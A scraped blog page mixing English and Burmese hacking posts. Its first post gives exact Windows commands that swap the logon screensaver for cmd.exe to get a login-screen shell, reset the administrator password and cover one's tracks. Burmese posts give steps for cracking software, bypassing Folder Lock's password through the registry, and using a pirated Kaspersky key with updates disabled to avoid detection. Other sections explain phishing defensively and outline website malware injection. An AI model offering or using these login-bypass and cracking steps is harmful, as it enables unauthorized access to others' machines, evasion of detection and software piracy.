ဗဟုသုတဘဏ်
Labels: Hacking, proxy-II, Softwares-XII
This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
Labels: Computer-V, Hacking, XP
Phishing scams have rocked Internet users for some time now.
But phishing attacks especially intensified in 2004, making them a very serious emerging threat that rides on the surge of e-commerce and e-banking transactions through fraudulent means, says a study conducted by anti-virus software specialist Trend Micro.
What is phishing?
Phishing means sending an e-mail that falsely claims to be from a particular enterprise (like your bank) and asking for sensitive financial information.
Phishing is sending out a 'bait' in the form of a spoofed e-mail that closely mimics most bank notifications.
The fraudulent mail is socially engineered to convince recipients to divulge sensitive information such as credit card numbers, PIN, social security numbers and some such information, says Trend Micro.
Some phishing mails include a legitimate-looking URL that actually conceals the phishing URL, or the site where the stolen information is stored, while some include an image, which when clicked, directs the affected user to the phishing site.
There are ways to 'spoof' an e-mail so that it appears to have come from someone other than the person who is actually sending it. An e-mail can be spoofed by tweaking the settings of e-mail clients like Outlook Express, Netscape Messenger and Eudora. E-mail spoofing is a popular way of scamming online.
How to be safe
Trend Micro lists out the ways in which you can keep yourself safe from phishing scams:
How to find out if an e-mail is genuine
However, finding out whether an e-mail is genuine or not is not very difficult. Every e-mail message contains headers that have the following information:
Check out this URL: http://www.lse.ac.uk/itservices/help/e-mailheader.htm for an example of what the different things in an e-mail header mean.
By learning how to identify what the header components are you can distinguish whether an e-mail is genuine or spoofed.
From May 2004 to November 2004 alone, Trend Micro registered a total of 9,709 phishing mails. July generated the most number of phishing mail incidence with 2,932 received samples, which is a huge leap from the total of 104 phishing mails recorded in May.
Most phishing attacks from May to November 2004 targeted Citibank, covering a little more than half of the entire phishing incidence recorded. Citibank has banking, lending, and investment services worldwide making it a prime target for these types of attack.
US Bank, one of the largest financial services holding companies in the United States, comes in second in the list of most targeted banks, with 21 per cent.
Suntrust (one of the largest commercial banking institutions in the US) and Ebay (an international online "marketplace") are next on the list with 10 per cent and 8 per cent, respectively.
Even in India, ICICI Bank, Citibank and other financial institutions have been targetted by 'phishers.'
A legitimate financial institution will never ask for details of your account via an e-mail. You must never e-mail financial information over the Internet as it is not a secure method for transmitting such sensitive information. |
|
Labels: Hacking, Knowledges-II
Activation Cracking ဆိုတာ
Software company ေတြက Serial Key က ျပန္႔သြားႏိုင္ ဒါေၾကာင့္ Acivation ထပ္လုပ္ပါတယ္။ Activation ဆိုတာက Serial Key ကို အင္တာနက္ကတစ္ဆင့္ သူတို႔ဆီပို႔ရင္ အစစ္ ဟုတ္တယ္္ဆိုမွ ကြၽန္ေတာ္တို႔သံုးေနတဲ့ Software မွာ ျပန္လာထညဖို့ ့္Activation code ျပန္ထုတ္ေပးတာကို ေခၚပါတယ္.....
လိုအပ္ခ်က္
Crack လုပ္ဖို႔အတြက္ Assembly ကို ကြ်မ္းက်င္ရပါမယ္...Keygen ၿပန္ထုတ္ခ်င္ရင္ C/C++တတ္ကြ်မ္းရပါမယ္...VB, VB.net, C# စတာေတြကို Crack လုပ္ရတာ လြယ္ကူပါတယ္။ Decompiler သံုးလုိက္ရင္ မူရင္း Code အကုန္ၿပန္ထြက္ပါတယ္။ Key စစ္ထားတဲ့ Routing ကို ၾကည့္ၿပီး အေၿဖထုတ္ရံုပါဘဲ....
ျပဳလုပ္နည္းမ်ား
Software company ေတြက Serial Key က ျပန္႔သြားႏိုင္ ဒါေၾကာင့္ Acivation ထပ္လုပ္ပါတယ္။ Activation ဆိုတာက Serial Key ကို အင္တာနက္ကတစ္ဆင့္ သူတို႔ဆီပို႔ရင္ အစစ္ ဟုတ္တယ္္ဆိုမွ ကြၽန္ေတာ္တို႔သံုးေနတဲ့ Software မွာ ျပန္လာထညဖို့ ့္Activation code ျပန္ထုတ္ေပးတာကို ေခၚပါတယ္.....
တစ္ခ်ိဳ႕ Software ေတြက်ေတာ့ ဘာမွမေတာင္းပဲ သံုးၿပီး တစ္ပတ္ေလာက္ေနမွ register လုပ္ခိုင္းပါသည္။ အင္တာနက္ႏွင့္သာ လုပ္ခိုင္းပါသည္။ ထိုကဲ့သို႔ software မ်ိဳးဆိုလွ်င္ Exe file replace လုပ္ျခင္းျဖင့္ Crack လုပ္ရပါသည္။
တစ္ခ်ိဳ႕ Software ေတြက်ေတာ့ သူတို႔ software ကို သံုးႏိုင္ရန္ registration file , License Key ဆိုေသာ ဖိုင္တစ္ဖိုင္ကို ထည့္ေပးရပါသည္။ ကြန္ပ်ဴတာတစ္လံုးႏွင့္တစ္လံုး License Key တူ၍မရပါ။ Kaspersky ကို Crack လုပ္ရန္ ထို License key ကို အင္တာနက္ထဲရာွ ထည့္ျပီးမွ Automatic Updates ကို disable လုပ္ရပါ....အဲဒီလိုမလုပ္ရင္ Automatic Updates လုပ္တဲ့အခါ ခုိးသံုးထားမွန္း သိသြားႏိုင္ပါသည္။
Crack ျပဳလုပ္ျခင္းျဖင့္ Software ကို Free သံုးရ ေသာ္လည္း ဗိုင္းရပ္စ္အကိုက္ခံရျခင္း၊ အခ်က္အလက္မ်ား အခိုးခံရျခင္းမ်ိဳးမ်ား ျဖစ္ႏိုင္ပါတယ္......
1....ပထမဆုံး Registry ထဲဝင္ပါ... အဲဒီမွာ (regedit) လို႕ရိုက္......
2....(HKEY_CURRENT_USER >Software > Folder Lock
3....ညာဘက္မွာ (Bar Code) ကိုDelete ႏွိပ္လိုက္ (Yes) ဆက္ႏွိပ္ပါ...
4....ၿပီးရင္ Folder Lock ကို၀င္ပါ Enter Password ေနရာမွာႀကိဳက္တဲ႕ပာာရိုက္ဝင္သြားပါလိမ္႕မယ္...
5...Option ထဲဝင္ပါ Change Password မွာ ကိုေပးခ်င္တဲ႕ပာာသာေပးလိုက္ပါ ၿပီးရင္ထြက္လို႕ရပါျပီ...
5.... Folder Lock ထဲျပန္ဝင္ပါ Please Read Carefually ဆိုတာေတြ႕ပါလိမ္႕မယ္
6....(Login) ထဲသြားပါ (Enter your UserID : Peter Schalk ) (Password : ***********) ၿပီးရင္ (OK) ေပါ႕ (Exit) ကိုထပ္ႏွိပ္ပါ
7....Folder Lock ထဲျပန္ဝင္ပါ အခုနကိုယ္ေပးခဲ႕တဲ႕ Password ကိုျပန္ရိုက္ပါ အဆင္ေျပစြာနဲ႕ Folder Lock ထဲဝင္သြားပါလိမ္႕မယ္...
အဲဒီ crack folder (0r) file ေလးမ်ားကို ေကာ္ပီကူးျပီး ၀င္းဒိုးထဲက သက္ဆိုင္ရာ ပရုိဂရမ္ဖိုင္မွာ သြားထည့္လိုက္ရံုပါပဲ။ အဲဒီအခ်ိန္မွာ မူရင္းဖိုင္ေတြအေပၚမွာ replace လုပ္မလားလို႔ မ်ားေသာအားျဖင့္ ေမးတတ္ပါတယ္။ အဲဒီအခ်ိန္မွာ Yes ဆိုျပီး click နွိပ္ေပးလိုက္တာနဲ႔ crack လုပ္တဲ့ ကိစၥ ျပီးဆံုးသြားပါျပီ။ သက္ဆိုင္ရာ ေဆာ့၀ဲလ္ကို full version အျဖစ္ အသံုးျပဳနိုင္ျပီ ျဖစ္ပါတယ္။
ဥပမာ- babylon dictionary ကို crack လုပ္ရမယ္ ဆိုၾကပါဆို႔....
crack file ကို copy လုပ္ျပီး C:\Program Files\Babylon\Babylon-Pro ထဲမွာ paste လုပ္လိုက္ရင္ crack ခ်ိဳးတဲ့ ကိစၥ ျပီးသြားျပီ ျဖစ္ပါတယ္။
မွတ္ခ်က္။ ။ crack ခ်ိဳးတဲ့ အခ်ိန္မွာ သက္ဆိုင္ရာ software ကုိ ပိတ္ထားရမွာ ျဖစ္ပါတယ္။
သူက crack နဲ႔ သိပ္မကြာပါဘူး။ patch ဖိုင္ေလးကို ၀င္းဒိုးတင္ထားတဲ့ သက္ဆိုင္ရာ program file ေလးထဲ ထည့္ျပီး double click နွိပ္ျပီး ဖြင့္လိုက္ပါ။ ဒါဆုိရင္ patch ဖိုင္ပြင့္လာပါလိမ့္မယ္။ အဲဒီ patch ဖိုင္မွာ patch (သို႔) register ဆိုတဲ့ button ေလးပါလာပါလိမ့္မယ္။ အဲဒါေလးကို ကလစ္လိုက္ရင္ patch လုပ္လို႔ ျပီးဆံုးျပီ ျဖစ္ပါတယ္။
keygen ဆိုတဲ့ ဖိုင္ေလးက လိုအပ္တဲ့ ေဆာ့၀ဲလ္စတင္ကတည္းက အသံုးျပဳရတာ မ်ားပါတယ္။ application software စတင္တဲ့ အခ်ိန္ serial key ေတာင္းပါလိမ့္မယ္။ အဲဒီအခ်ိန္ keygen ေလးကို double click နွိပ္ျပီး ေပၚလာတဲ့ ကီးလ္ေလးေတြကို သက္ဆိုင္ရာ ေနရာမွာ ျဖည့္ေပးလိုက္ရင္ ရပါတယ္။ တစ္ခ်ိဳ႕ ေဆာ့၀ဲလ္ေတြမွာ က်ေတာ့ software တင္ျပီးတဲ့ အခ်ိန္မွ serial key ကုိ ေတာင္းတတ္ပါတယ္။ အဲဒီအခ်ိန္မွာ သြားျပီး ျဖည့္ေပးလည္း ရပါတယ္။ ( အေပၚမွာေျပာခဲ့သလိုေပါ့... )
How To: Crack a File
ယခုအခ်ိန္ေတြမွာ website ေတြ အဟက္ခံရတယ္။ တစ္ခုၿပီးတစ္ခုပါပဲ။ ဒါေတြက website တစ္ခု အဟက္ခံရလုိ႔ အဲ႔ site တစ္ခုတည္းထိတာမဟုတ္ပါဘူး။ ဟက္ကာေတာ္ေတာ္မ်ားမ်ားက site တစ္ခုကုိရသြားရင္ defacement တစ္ခုလုပ္တာကလြဲရင္ က်န္တာဘာမွမလုပ္ပါဘူး။ ဒီအတြက္ လာေရာက္လည္ပတ္တဲ႔သူကုိလည္း မထိခုိက္ပါဘူး။ ဒါေပမဲ႔ အႏၱရယ္ရွိတာက Mailicous Code ေတြ ထည့္သြားမ့ဲ Hacker ေတြကုိေတာ့ အလြန္ကုိ ေၾကာက္စရာ ေကာင္းတယ္ ဆုိတာ သိေစခ်င္လုိ႔ ဒီ Post ကုိ Korea Information Security Agency နဲ႔ ကၽြန္ေတာ့္ မိတ္ေဆြ bot hacker (တရုတ္ၿပည္မွ Game Password Hacker) တစ္ေယာက္ တုိ႔အား ကုိးကားၿပီးေရးထားတာပါ။
Malicious Codes မ်ား ထည့္သြင္းမႈအတြက္ ဟက္ကာေတြ တုိက္ခုိက္ရာတြင္
၁. တုိက္ခုိက္ေရးသမားေတြက မိမိတုိ႔ရဲ႕ Target ကြန္ပ်ဴတာ၊ အဖြဲ႕အစည္း၊ Website ေတြထဲကုိ SQL Injection ေတြနဲ႔ ၀င္ေရာက္ၾကပါတယ္။ SQL Injection ေတြတစ္ခုတည္းလားဆုိေတာ့လည္း ဒီတစ္ခုတည္းေတာ့မဟုတ္ပါဘူး။ တစ္ၿခားတုိက္ခုိက္လုိ႔ရတဲ႔ နည္းလမ္းေတြအမ်ားၾကီးရွိပါတယ္။ ဘယ္လုိပင္ ၿဖစ္ပါေစ သူတုိ႔ လုိခ်င္တဲ႔အပုိင္းကေတာ့ user ေတြ အမ်ားအၿပား ၀င္ေရာက္လည္ပတ္တတ္တဲ႔ ေနရာေတြပါ။ ဒီလူေတြဆီကေန Cookies ေတြခုိးမယ္။ IP ေတြယူမယ္ စသည္ၿဖင့္ေပါ႔။
၂။ တုိက္ခုိက္ေရးသမားေတြက Vulnerability Website ေတြထဲမွာ ၄င္းတုိ႔ရဲ႕ Malicious Code ေတြ ထည့္သြင္းထားေသာ Attacker ရဲ႕ Web Link ေတြ ခ်ိတ္ဆက္ေပးပါတယ္။ ဒီလုိခ်ိတ္ဆက္တဲ႔ေနရာမွာ iframe ဆုိတာနဲ႔သုံးၾကပါတယ္။
iframe ဆုိတာ webpage element တစ္ခုၿဖစ္ၿပီး တစ္ၿခား web page ေတြကုိ ၄င္းရဲ႕ သတ္မွတ္ထားတဲ႔ ေဘာင္အတြင္းမွာ အလုပ္လုပ္ရန္အတြက္ အသုံးၿပဳၾကပါတယ္။ ....
ဥပမာ . . Planet Myanmar Website မွာ Iframe ကုိထည့္သြင္းထားပုံကုိၾကည့္ပါ။
ဆုိတာကုိၾကည့္ပါ။
၃. အဲ႔အခ်ိန္မွာ အင္တာနက္ အသုံးၿပဳသူေတြက Attacker (Hacker) ေတြ ဟက္လုပ္ထားတဲ႔ Website ေတြကုိ ၀င္ေရာက္လည္ပတ္ပါတယ္။
၄. အကယ္၍ အင္တာနက္ အသုံးၿပဳရဲ႕ ကြန္ပ်ဴတာက လုံၿခံဳေရးမရွိၿခင္း၊ Up to Date မၿဖစ္ေနတဲ႔ Internet Security or Antivirus မရွိဘူးဆုိရင္ ထုိကဲ႔သုိ႔ေသာ Website မွေန အလြယ္တကူ မိမိရဲ႕ ကြန္ပ်ဴတာကုိ Trojan ေတြ၀င္ေရာက္လာပါလိမ့္မယ္။
၅. ၿပီးရင္ မိမိရဲ႕ Information ေတြ၊ user ID, Password ေတြကုိ သတ္မွတ္ထားတဲ႔ လမ္းေၾကာင္းလိပ္စာအတုိင္း ၿပန္လည္ခုိးယူပုိ႔ေပးပါလိမ့္မယ္။
ဒီလုိတုိက္ခုိက္မႈမ်ိဳးက ယေန႔ေခတ္မွာေတာ္ေတာ္ေလးကုိ ေတြ႔ရၿပီး Porn / Unsecure site ေတြကုိ ၀င္ေရာက္လည္ပတ္က Antivirus အသြင္၀င္ေရာက္လာတတ္တဲ႔ Malware ေတြနဲ႔ ဆင္တူပါတယ္။ ဒါေပမဲ႔ဒီေကာင္က နဲနဲအဆင့္ပုိၿမင့္သြားတယ္။ ဒီလုိပုံစံေတြက Website ေတာ္ေတာ္မ်ားမ်ားမွာ ၿဖစ္ၾကၿပီးေတာ့ ၿဖစ္လုိက္တဲ႔ Website ေတြရဲ႕ ၉၀ ရာခုိင္းႏႈန္းကေတာ့ SQL Injection vulnerability မွေန ဟက္ကာေတြ ၀င္ေရာက္ကာ malicious codes ေတြ ထည့္သြင္းသြားၿခင္းၿဖစ္ပါတယ္။
ေနာက္တစ္ခုကေတာ့ Upload Vulnerability ပါ.. သူကေတာ့ WebBoard ေတြမွာ user ေတြအတြက္ image upload ေတြေပးထားတာကေနၿဖစ္တာပါ။
i. ထုိ Web Board က extension ဖုိင္ စီစစ္မႈကုိမထားၿခင္း။ ( Webmaster ေတြသတိၿပဳရမွာက ထုိကဲ႔သုိ႔ေသာ Upload setting မွာ extension filtering ကုိစစ္ဖုိ႔လုိပါတယ္)
ii. Upload လုပ္ထားေသာ file ၏ လမ္းေၾကာင္းကုိ user ႏွင့္ Attacker မွ အလြယ္တစ္ကူ ရယူသိရွိႏုိင္ၿခင္း။
iii. Upload လုပ္ထားေသာ file မ်ားရွိ folder အား execute လုပ္ခြင့္ ခြင့္ၿပဳခ်က္ေပးထားၿခင္းေၾကာင္းၿဖစ္သည္။
ဒီေတာ့ Trojan File ေတြနဲ႔ user ေတြကုိ ဘယ္လုိ တုိက္ခုိက္လဲဆုိတာကုိ အနည္းငယ္ ထပ္ၿပီးရွင္းပါမယ္..
Ice Fox Prodigal Web Trojan Generator ဒါက Website ေတြကုိ တုိက္ခုိက္တဲ႔ေနရာမွာ အလြယ္တကူ အသုံးၿပဳႏုိင္တဲ႔ Virus Creator တစ္ခုပါပဲ။ (ဟက္ကာေတာ္ေတာ္မ်ားမ်ားကေတာ့ သူတုိ႔ကုိယ္တုိင္ Code လုပ္တာမ်ားပါတယ္။)
Labels: Hacking
Labels: eBooks, Hacking, Websites-IV
Labels: Hacking, နည္းပညာမ်ား-II
Labels: Hacking, နည္းပညာမ်ား-II
ကျေးဇူးတင်ပါတယ် မုန်တိုင်း
ကျန်းမာကြပါစေ